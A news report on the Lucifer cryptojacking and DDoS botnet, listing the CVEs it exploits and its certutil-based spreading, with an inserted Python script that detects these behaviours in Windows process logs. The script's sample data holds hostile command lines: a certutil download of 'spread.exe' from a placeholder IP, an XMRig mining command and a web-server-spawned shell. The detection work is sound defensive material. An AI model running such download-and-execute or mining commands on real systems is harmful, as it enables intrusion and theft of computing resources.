This new Lucifer DDoS botnet uses a dozen exploits to break into Windows systems


New Lucifer DDoS botnet can exploit a dozen vulnerabilities to hack into a Windows Operating System

Researchers have found a new DDoS botnet, dubbed Lucifer, that can exploit a dozen vulnerabilities to break into Windows hosts. Lucifer has appeared in the threat landscape carrying exploits for high- and critical-severity flaws that affect Windows systems and the web applications running on them. Beyond compromising the host, the bot turns it into a cryptocurrency mining client and can use it to launch distributed denial-of-service (DDoS) attacks.

We discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts.

Unit42 researchers

According to the researchers, Lucifer is quite powerful in its capabilities. Not only does it drop XMRig to mine Monero, it also supports command-and-control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs the EternalBlue and EternalRomance exploits and the DoublePulsar backdoor against vulnerable targets to infect hosts on the intranet.

The botnet carries a dozen weaponized exploits. The list includes CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, the ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, the PHPStudy backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

Once a host is exploited, the attacker can execute arbitrary commands on it. In this case the targets are Windows hosts on both the internet and the intranet, since the attacker relies on the Windows certutil utility in the payload to propagate the malware.
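The propagation behaviour described above (certutil used as a downloader, a miner dropped on the host, and commands spawned from an exploited web application) is something a defender can hunt for in process-creation telemetry. The Python below is an added example and is not Unit42's or Android Rookies' code. The event format is a constructed, simplified form of a Sysmon process-creation record (host | parent image | image | command line), the sample lines are made up, and the certutil command-line pattern and the list of web/application-server parent processes are assumptions based on the generic certutil download technique and common server binaries, not on Lucifer's actual payload.

```python
"""Triage Windows process-creation events for the behaviours described in
the Lucifer write-up: certutil used as a downloader, an XMRig miner, and a
shell spawned by an exploited web/application server.

Added example (not Unit42's or Android Rookies' code). Event format and
sample events are constructed: host|ParentImage|Image|CommandLine.
"""
import ntpath
import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample events. 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = r"""
WEB01|C:\Windows\System32\svchost.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.10:8080/spread.exe C:\Windows\Temp\spread.exe
WEB01|C:\Windows\System32\cmd.exe|C:\Windows\Temp\spread.exe|C:\Windows\Temp\spread.exe
WEB01|C:\Windows\Temp\spread.exe|C:\Windows\Temp\xmrig.exe|xmrig.exe -o stratum+tcp://pool.example:3333 -u 4AbCdEfWalletPlaceholder --donate-level 1
WEB02|C:\Program Files\Java\bin\java.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami
ADMIN|C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil.exe -store My
WS07|C:\Windows\System32\svchost.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f https://update.example.internal/agent.msi agent.msi
"""

# certutil download pattern (assumption: the generic "-urlcache ... -f <url>" form).
URLCACHE = re.compile(r"(?i)-urlcache\b")
FETCH = re.compile(r"(?i)(?:^|\s)-f\s+(https?://\S+)")
DECODE = re.compile(r"(?i)-decode\b")
# Stratum pool URL scheme used by miners such as XMRig.
STRATUM = re.compile(r"(?i)stratum\+tcp://\S+")

# Assumed parent binaries for the web/application servers the article lists
# (IIS, Jenkins/WebLogic/Tomcat on Java, PHP-based apps); adjust per estate.
WEB_PARENTS = {"w3wp.exe", "java.exe", "php-cgi.exe", "php.exe", "httpd.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "certutil.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Split one pipe-delimited event into its four fields."""
    host, parent, image, cmdline = line.split("|", 3)
    return {"host": host, "parent": parent, "image": image, "cmdline": cmdline}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def classify(ev: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs that fire for a single event."""
    findings: List[Tuple[str, str]] = []
    image, parent, cmd = _base(ev["image"]), _base(ev["parent"]), ev["cmdline"]

    if image == "certutil.exe":
        fetch = FETCH.search(cmd)
        if URLCACHE.search(cmd) and fetch:
            # certutil pulling a remote file: the downloader behaviour.
            findings.append(("certutil_download", fetch.group(1)))
        elif DECODE.search(cmd):
            # certutil decoding a base64 blob: common staging step.
            findings.append(("certutil_decode", cmd))

    pool = STRATUM.search(cmd)
    if image == "xmrig.exe" or pool or "--donate-level" in cmd.lower():
        findings.append(("xmrig_miner", pool.group(0) if pool else image))

    if parent in WEB_PARENTS and image in SHELLS:
        # A server process spawning a shell is consistent with RCE via a web app.
        findings.append(("webserver_spawned_shell", f"{parent} -> {image}"))
    return findings


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Run every rule over every non-empty event line."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = parse_event(line)
        for rule, detail in classify(ev):
            hits.append({"host": ev["host"], "rule": rule, "detail": detail})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{hit['host']:6} {hit['rule']:24} {hit['detail']}")
```

The last sample line shows why these rules are triage signals rather than verdicts: a legitimate agent installer fetched with certutil fires the same rule as the malicious download, so the URL and parent process on each hit still need analyst review.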

These vulnerabilities are rated high or critical severity because of the impact they have on the victim. Fortunately, patches for all of them are readily available.

The experts spotted the botnet while investigating several attempts to exploit CVE-2019-9081, a critical RCE vulnerability that affects a component of the Laravel web framework. A first variant of the Lucifer bot was discovered on May 29 as part of a campaign that stopped on June 10 and resumed on June 11 with an updated version of the bot.

Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms. Applying the updates and patches to the affected software is strongly advised. The vulnerable software includes Rejetto HTTP File Server, Jenkins, Oracle Weblogic, Drupal, Apache Struts, Laravel framework, and Microsoft Windows. Strong passwords are also encouraged to prevent dictionary attacks.

said the researchers

To stay protected, organizations should apply the latest patches to their systems as soon as they become available. For more news on tech and cybersecurity, stay tuned to Android Rookies.

